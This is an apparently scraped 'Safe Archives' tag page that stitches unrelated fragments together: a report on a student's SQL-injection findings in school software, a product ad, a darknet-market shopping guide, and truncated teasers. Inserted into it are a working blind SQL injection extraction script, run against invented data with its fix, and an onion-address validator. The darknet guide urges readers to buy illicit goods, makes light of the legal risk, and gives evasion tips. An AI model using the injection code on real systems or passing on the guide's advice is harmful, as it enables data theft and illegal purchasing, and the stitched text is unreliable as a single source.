Safe Archives -
The label may say “no nitrites.” But that doesn’t mean there are no nitrites.
The man who used to call himself “America’s Toughest Sheriff” now appears to be America’s most tenacious ex-sheriff. Joe Arpaio, who lost his bid for re-election in Arizona’s Maricopa County in 2016 and was pardoned by President Trump the following year after being convicted of criminal contempt of court, wants…
Turns out, according to one student security researcher, they’re not.
Eighteen-year-old Bill Demirkapi, a recent high school graduate in Boston, Massachusetts, spent much of his later school years with an eye on his own student data. Through self-taught pen testing and bug hunting, Demirkapi found several vulnerabilities in his school’s learning management system, Blackboard, and in his school district’s student information system, known as Aspen and built by Follett, which centralizes student data, including performance, grades, and health records.
The former student reported the flaws and revealed his findings at the Def Con security conference on Friday.
“I’ve always been fascinated with the idea of hacking,” Demirkapi told TechCrunch prior to his talk. “I started researching but I learned by doing,” he said.
One of the more damaging issues Demirkapi found in Follett’s student information system was an improper access control vulnerability which, if exploited, could have allowed an attacker to read from and write to the central Aspen database and obtain any student’s data.
Blackboard’s Community Engagement platform had several vulnerabilities, including an information disclosure bug. A debugging misconfiguration exposed two subdomains that returned the credentials for Apple app provisioning accounts belonging to dozens of school districts, as well as database credentials for most, if not all, Community Engagement deployments, Demirkapi said.
Another set of vulnerabilities could have allowed an authorized user — like a student — to carry out SQL injection attacks. Demirkapi said six databases could be tricked into disclosing data by injecting SQL commands, including grades, school attendance data, punishment history, library balances, and other sensitive and private data.
Some of the SQL injection flaws were blind, meaning the application revealed only whether an injected condition was true or false rather than echoing query results, so dumping the entire database would have been slower and more laborious, but not impossible.
In all, over 5,000 schools and over five million students and teachers were impacted by the SQL injection vulnerabilities alone, he said.
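To make the distinction between a blind injection and an ordinary one concrete, here is an added example that is not code from the article or from either vendor. It is a generic demonstration of the bug class against a constructed in-memory SQLite table (the `students` schema, rows and the `student_exists_*` lookup functions are all made up for illustration) and says nothing about how Aspen or Blackboard were actually built. The vulnerable lookup returns only yes/no, yet that single bit is enough to recover another row’s value one character at a time by binary search; the parameterized version of the same lookup gives the attacker nothing.

```python
"""Boolean-based blind SQL injection against a constructed SQLite table, and the fix.

Added example: not taken from the article or from Follett/Blackboard code.
The schema, data and lookup functions below are invented for illustration.
"""
import sqlite3

# Constructed sample data; not real student records.
SCHEMA = """
CREATE TABLE students (id INTEGER PRIMARY KEY, name TEXT NOT NULL, grade TEXT NOT NULL);
INSERT INTO students VALUES (1, 'alice', 'A-');
INSERT INTO students VALUES (2, 'bob', 'C+');
"""


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def student_exists_vulnerable(conn: sqlite3.Connection, name: str) -> bool:
    """The 'before': user input is spliced into the SQL text, so a quote in
    `name` ends the literal and the rest is executed as SQL. The caller only
    ever learns True/False, which is what makes the resulting injection blind."""
    sql = f"SELECT 1 FROM students WHERE name = '{name}'"
    return conn.execute(sql).fetchone() is not None


def student_exists_fixed(conn: sqlite3.Connection, name: str) -> bool:
    """The 'after': a bound parameter keeps `name` as data, never as code."""
    return conn.execute("SELECT 1 FROM students WHERE name = ?", (name,)).fetchone() is not None


def blind_extract(oracle, target_sql: str, max_len: int = 64) -> str:
    """Recover the string value of the scalar subquery `target_sql` using only
    the yes/no answers of `oracle(payload)`.

    Each character costs about seven queries (binary search over printable
    ASCII 32..126), which is why a blind dump is slow compared with an
    error- or UNION-based one, but still entirely feasible."""
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop once the position is past the end of the value.
        if not oracle(f"' OR length(({target_sql})) >= {pos} -- "):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            # SQLite's unicode() returns the code point of the first character.
            if oracle(f"' OR unicode(substr(({target_sql}), {pos}, 1)) > {mid} -- "):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


TARGET = "SELECT grade FROM students WHERE id = 2"  # another student's grade


def demo_vulnerable() -> str:
    """Extract bob's grade through the string-concatenated lookup."""
    conn = open_db()
    return blind_extract(lambda payload: student_exists_vulnerable(conn, payload), TARGET)


def demo_fixed() -> str:
    """Same attack against the parameterized lookup: the payload is just an
    unknown name, the oracle always says no, and nothing is recovered."""
    conn = open_db()
    return blind_extract(lambda payload: student_exists_fixed(conn, payload), TARGET)


if __name__ == "__main__":
    print("vulnerable lookup leaked:", repr(demo_vulnerable()))
    print("parameterized lookup leaked:", repr(demo_fixed()))
```

The payloads never see a row of output; the attacker is only counting how many times the page says “found”. That is the property the word blind refers to, and the reason the defence has to be parameterization (or an equivalent separation of code and data) rather than hiding error messages.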
Demirkapi said he was mindful to not access any student records other than his own. But he warned that any low-skilled attacker could have done considerable damage by accessing and obtaining student records, not least thanks to the simplicity of the database’s password. He wouldn’t say what it was, only that it was “worse than ‘1234’.”
But finding the vulnerabilities was only one part of the challenge. Disclosing them to the companies turned out to be just as tricky.
Demirkapi admitted that his disclosure with Follett could have been better. He found that one of the bugs gave him improper access to create his own “group resource,” such as a snippet of text, which was viewable to every user on the system.
“What does an immature 11th grader do when you hand him a very, very, loud megaphone?” he said. “Yell into it.”
And that’s exactly what he did. He sent out a message to every user, displaying each user’s login cookies on their screen. “No worries, I didn’t steal them,” the alert read.
“The school wasn’t thrilled with it,” he said. “Fortunately, I got off with a two-day suspension.”
He conceded it wasn’t one of his smartest ideas. He wanted to show his proof-of-concept but was unable to contact Follett with details of the vulnerability. He later went through his school, which set up a meeting, and disclosed the bugs to the company.
Blackboard, however, ignored Demirkapi’s emails for several months, he said. He knows because, after the first month without a reply, he added an email tracker that let him see how often the message was opened: several times in the first few hours after sending. Yet the company still did not respond to his bug report.
Blackboard eventually fixed the vulnerabilities, but Demirkapi said he found that the companies “weren’t really prepared to handle vulnerability reports,” despite Blackboard ostensibly having a published vulnerability disclosure process.
“It surprised me how insecure student data is,” he said. “School data or student data should be taken as seriously as health data,” he said. “The next generation should be one of our number one priorities, who looks out for those who can’t defend themselves.”
He said if a teenager had discovered serious security flaws, it was likely that more advanced attackers could do far more damage.
Heather Phillips, a spokesperson for Blackboard, said the company appreciated Demirkapi’s disclosure.
“We have addressed several issues that were brought to our attention by Mr. Demirkapi and have no indication that these vulnerabilities were exploited or that any clients’ personal information was accessed by Mr. Demirkapi or any other unauthorized party,” the statement said. “One of the lessons learned from this particular exchange is that we could improve how we communicate with security researchers who bring these issues to our attention.”
Follett spokesperson Tom Kline said the company “developed and deployed a patch to address the web vulnerability” in July 2018.
The student researcher said he was not deterred by the issues he faced with disclosure.
“I’m 100% set already on doing computer security as a career,” he said. “Just because some vendors aren’t the best examples of good responsible disclosure or have a good security program doesn’t mean they’re representative of the entire security field.”
“Don’t shoot me.” That was the message one pro-democracy protester held up, on the sort of sign usually reserved for the names of hotel guests, as demonstrators camped out in the arrivals hall of Hong Kong International Airport on Friday, July 26.
In this day and age, carrying your wallet, passport and mobile phone inside the inner pocket of your jacket is simply not enough to protect your assets. Thankfully, there’s a company called Tarriss which offers products designed to secure both your digital cash and personal data. It sells them for cryptocurrency and it takes bitcoin cash.
Tarriss Accepts Bitcoin Cash and Ships Globally
Nowadays your electronic money and your digital identity are exposed to various invisible risks. You can be robbed, tracked and hacked remotely. Wireless technologies can provide third parties with unwarranted access to your most precious data.
That’s why Tarriss, a company based in the Canadian city of Vancouver, has set out to develop protection for the money, documents and gadgets you’ll use while traveling, for example. It makes RFID-shielding and Faraday cage products that block wireless signals, which the company says safeguard your electronic devices and keep your privacy from being compromised.
The platform ships these items worldwide and accepts major cryptocurrencies like bitcoin cash (BCH), bitcoin core (BTC), ethereum (ETH), and litecoin (LTC), besides traditional payment methods such as Mastercard and Apple Pay. The prices on their website can be denominated in six fiat currencies – U.S. dollar, Canadian dollar, Australian dollar, British pound, euro, and Japanese yen.
Among the products offered by Tarriss, you’ll find the RFID Passport Holder & Neck Wallet. It’s a smart invention that protects your RFID enabled credit cards and international passport. They also sell an RFID Money Belt & Hidden Travel, in case you prefer the fanny pack style solutions.
You can also order the Godark Faraday Bag which blocks EMF frequencies, EMR, Wi-Fi, cellular and Bluetooth signals. These inventions will give you the peace of mind you need in the modern age, when cards and passports come with chips, and mobile devices with GPS and NFC capabilities can be tracked and hacked.
Have you considered buying products like those developed and sold by Tarriss? Tell us in the comments section below.
Disclaimer: Readers should do their own due diligence before taking any actions related to third party companies or any of their affiliates or services. Bitcoin.com is not responsible, directly or indirectly, for any damage or loss caused or alleged to be caused by or in connection with the use of or reliance on any third party content, goods or services mentioned in this article.
The post Keep Your Money and Passport Safe With Products You Can Buy With BCH appeared first on Bitcoin News.
3:19 PM PT — ROD SMART HAS BEEN FOUND SAFE!! Family and police sources tell us Smart has been located and he’s safe. We’re told Smart is surrounded by family and in the process of getting professional treatment. Story developing…
If you’re planning to visit a darknet market, you’re either keen to window shop or keen to sample the wares. Whatever your reasons for stopping by, that’s your business and no one else’s. Unfortunately, not everyone shares those civilized ideals. To keep those spoilsports at bay, here’s how to browse darknet markets (DNMs) without leaving a trace.
Step 1: Don’t Sweat It
If your interest in darknet markets extends to becoming a vendor, this guide isn’t for you. For one thing, you should already know this stuff, and for another, you should be following more rigorous opsec. If you’re a casual DNM shopper, however, and aren’t ordering your goods by the pound or kilo, don’t sweat it. The powers that be don’t have the time or resources to pester every single DNM customer. Even when entire marketplaces get compromised, exposing the details of thousands of users who were too lazy to encrypt their comms, it’s rare that anything comes of it.
If you’re a persistent DNM shopper and the postal service takes note of fragrant packages winging their way to your door, you might receive a ‘love letter’ from the police warning you to cease your activities, or even a knock at the door. Should that occur, don’t be cowed, as the feds are unlikely to press charges. Even law enforcement seems to begrudgingly concede that prosecuting victimless misdemeanors is a pointless exercise. Remember, most of this stuff will be made legal within our lifetime. It’s only a crime for a limited time.
Step 2: Configure Tor Correctly
To access the darknet, you’ll need Tor Browser. It can be downloaded for desktop or for Android. Alternatively, use the Brave or Dissenter browsers, which give the ability to open a Tor window, directly connecting you to the onion router where the world’s finest darknet markets are awaiting your perusal. The Tor Project website contains guides on protecting your privacy when using the darknet. Tor Browser will automatically block plugins such as Flash, RealPlayer, and QuickTime, which can be manipulated into revealing your IP address, and comes with the pro-privacy extensions HTTPS Everywhere and NoScript. When configured correctly, Tor will mask your IP address, but it remains your responsibility not to dox yourself by doing dumb stuff on the darknet. Tor’s an internet relay – not a cloak of anonymity and immunity.
Step 3: Double Check Your Onion Domains
Given that the average onion domain reads something like “7aj5bhidezdbb4ov” (that’s Empire market at the time of publication), it’s easy for a fat finger or phishing link to send you one character astray to a lookalike site that will keep your crypto and despatch the square root of zero to your door. Due to the takedown of darknet news site DeepDotWeb earlier this year, there aren’t many reliable clearnet DNM guides left. Dark.fail has done an admirable job lately, but reliance on a single point of failure is risky. Double check all links with those shared by DNM admins on the onion forum Dread.
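One thing a checksum can do for you here, and one thing it cannot, as an added example that is not part of the original guide or of Tor’s own code. Newer (v3) onion addresses are 56 characters long and carry a two-byte checksum, laid out per Tor’s rend-spec-v3 as base32(PUBKEY | CHECKSUM | VERSION) with CHECKSUM = SHA3-256(".onion checksum" | PUBKEY | VERSION)[:2] and VERSION = 0x03. A fat-fingered v3 address will almost always fail that check, so it is worth running before you paste in your crypto. A deliberately generated lookalike passes it, because the phisher computes a valid checksum for their own key, so the checksum is no substitute for comparing the address against one obtained from a trusted source. The 16-character v2 address quoted above has no checksum at all and can only be compared, not validated. The public key below is a constructed placeholder, not the key of any real service.

```python
"""Offline validation of v3 .onion addresses.

Added example; not code from the original article or from the Tor Project.
Layout follows Tor's rend-spec-v3:
    onion_address = base32(PUBKEY[32] | CHECKSUM[2] | VERSION[1]) + ".onion"
    CHECKSUM      = SHA3-256(".onion checksum" | PUBKEY | VERSION)[:2]
    VERSION       = 0x03
"""
import base64
import hashlib

ONION_V3_VERSION = b"\x03"
ONION_V3_LEN = 56  # 35 bytes -> 56 base32 characters, no padding

# Constructed placeholder key for the demo; NOT the key of any real service.
DEMO_PUBKEY = bytes(range(32))


def _checksum(pubkey: bytes) -> bytes:
    h = hashlib.sha3_256()
    h.update(b".onion checksum")
    h.update(pubkey)
    h.update(ONION_V3_VERSION)
    return h.digest()[:2]


def encode_onion_v3(pubkey: bytes) -> str:
    """Build the address an onion service would publish for a 32-byte ed25519 public key."""
    if len(pubkey) != 32:
        raise ValueError("ed25519 public key must be 32 bytes")
    raw = pubkey + _checksum(pubkey) + ONION_V3_VERSION
    # Every valid v3 address ends in 'd': the final base32 digit is the low 5 bits of 0x03.
    return base64.b32encode(raw).decode("ascii").lower() + ".onion"


def validate_onion_v3(address: str) -> bool:
    """True only for a well-formed v3 address whose embedded checksum matches.

    A False here means a typo or corruption. A True does NOT mean the address
    belongs to the service you think it does; compare it to a trusted copy."""
    addr = address.strip().lower()
    if addr.endswith(".onion"):
        addr = addr[: -len(".onion")]
    if len(addr) != ONION_V3_LEN:
        return False  # v2 (16 chars) or junk: nothing here to verify
    try:
        raw = base64.b32decode(addr.upper())
    except ValueError:  # binascii.Error is a subclass of ValueError
        return False
    pubkey, checksum, version = raw[:32], raw[32:34], raw[34:]
    return version == ONION_V3_VERSION and checksum == _checksum(pubkey)


def same_onion(candidate: str, trusted: str) -> bool:
    """Case- and suffix-insensitive comparison against an address from a trusted source."""
    norm = lambda a: a.strip().lower().removesuffix(".onion")
    return norm(candidate) == norm(trusted)


if __name__ == "__main__":
    addr = encode_onion_v3(DEMO_PUBKEY)
    typo = addr[:52] + ("a" if addr[52] != "a" else "b") + addr[53:]
    print(addr, validate_onion_v3(addr))
    print(typo, validate_onion_v3(typo))
    print("7aj5bhidezdbb4ov.onion", validate_onion_v3("7aj5bhidezdbb4ov.onion"))
```

Run it and you will see the intact address validate, the one-character typo fail, and the v2 address from the text rejected outright because there is nothing in it to check. That last case is the practical point of this step: for v2 links the only defence is comparing against the address the market’s admins post on Dread.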
Step 4: Keep It Fresh
Nicknames are like cryptocurrency wallet addresses: they don’t cost a penny and you’re free to use as many as you like. As such, there’s no excuse for recycling handles. Use a unique username and password for every DNM you join – that means a nickname you haven’t previously used anywhere else for anything. The annals of darknet criminology are filled with preventable tales of nickname reuse. Just ask Ross “Frosty” Ulbricht.
Similarly, when you’re sending funds to or from a DNM, create a new wallet address each time. If your crypto wallet app doesn’t let you create a new address, delete it and install one that does. For more tips on how to stay safe on the darknet, check out this week’s Humans of Bitcoin podcast, around the 15-minute mark, in which I discuss the perils of address and nickname reuse with host Matt Aaron.
Step 5: Know Your Vendor
When you log in to a darknet market for the first time, you’re greeted by a cornucopia of beguiling wares begging for your bitcoin. It’s like a magical Willy Wonka tuckshop for grownups. Before you start popping pills into your shopping cart, however, take a close look at the vendor you’re buying from. You wouldn’t make a $300 purchase from an eBay vendor with zero feedback. It’s the same on the darknet. Most vendors are legit, and have no intention of scamming their customers, but don’t trust – verify by checking their feedback. Bear in mind that a vendor with 100 four-star ratings is significantly more trustworthy than a vendor with five stars and three sales.
Step 6: Always Encrypt
The first time you try to use PGP (in practice usually the GnuPG, or GPG, implementation of the OpenPGP standard), it’ll take you 15 minutes to install it and successfully encrypt your first message to your darknet vendor. The second time will take you five minutes, the third time 60 seconds, and the fourth time you’ll be embarrassed at the thought of having ever communicated bareback on the darknet without PGP. News.Bitcoin.com plans to publish a comprehensive guide to PGP in the near future, but till then, your search engine is your friend. Don’t rely on darknet markets to encrypt on your behalf by ticking the request box upon submitting your order: the plaintext passes through, and may be stored on, the market’s servers, and if those are infiltrated by law enforcement, your conversations will be exposed.
There’s another benefit to being au fait with PGP, incidentally: when a vendor begins selling on a new marketplace, as commonly happens, given the short lifespan of DNMs, sharing their public key shows that they are the same entity, and effectively allows them to import the goodwill they’ve accrued elsewhere.
Freedom Thrives on the Darknet
Browsing the darknet is one of the most pleasurable things you can do on the web. It’s an internet free of popups, autoplay ads, cookie opt-ins, trigger warnings, snowflakes, thought police and killjoys. It’s everything the clearnet used to be, with the added bonus that you can buy just about anything with cryptocurrencies such as BTC, BCH, LTC, and XMR. You don’t have to nurse a penchant for the sort of goods the darknet is synonymous with to fire up your Tor browser – you simply need to appreciate the sense of freedom that comes from browsing the web unencumbered. Darknet is love. Darknet is life.
What’s your favorite darknet market? Let us know in the comments section below.
Disclaimer: Readers should do their own due diligence before taking any actions related to third-party companies, darknet markets, or any of their affiliates or services. Bitcoin.com is not responsible, directly or indirectly, for any damage or loss caused or alleged to be caused by or in connection with the use of or reliance on any third party content, goods or services mentioned in this article.
Many experts tried to open a safe locked for 40 years. A tourist’s lucky guess cracked the code on his first try
June 6, 2019 | dailybusinessnews
Over the years, the small Vermilion Heritage Museum in Alberta, Canada, tried everything in its power to unlock an old safe tucked away in its basement.
There are many elements to safety, and in determining this year’s safest states in America, WalletHub looked at dozens of them. The site compared all 50 states across 52 safety indicators from the areas of personal and residential safety (things like terrorist attacks, mass shootings, violent crimes, overdoses, suicides), financial…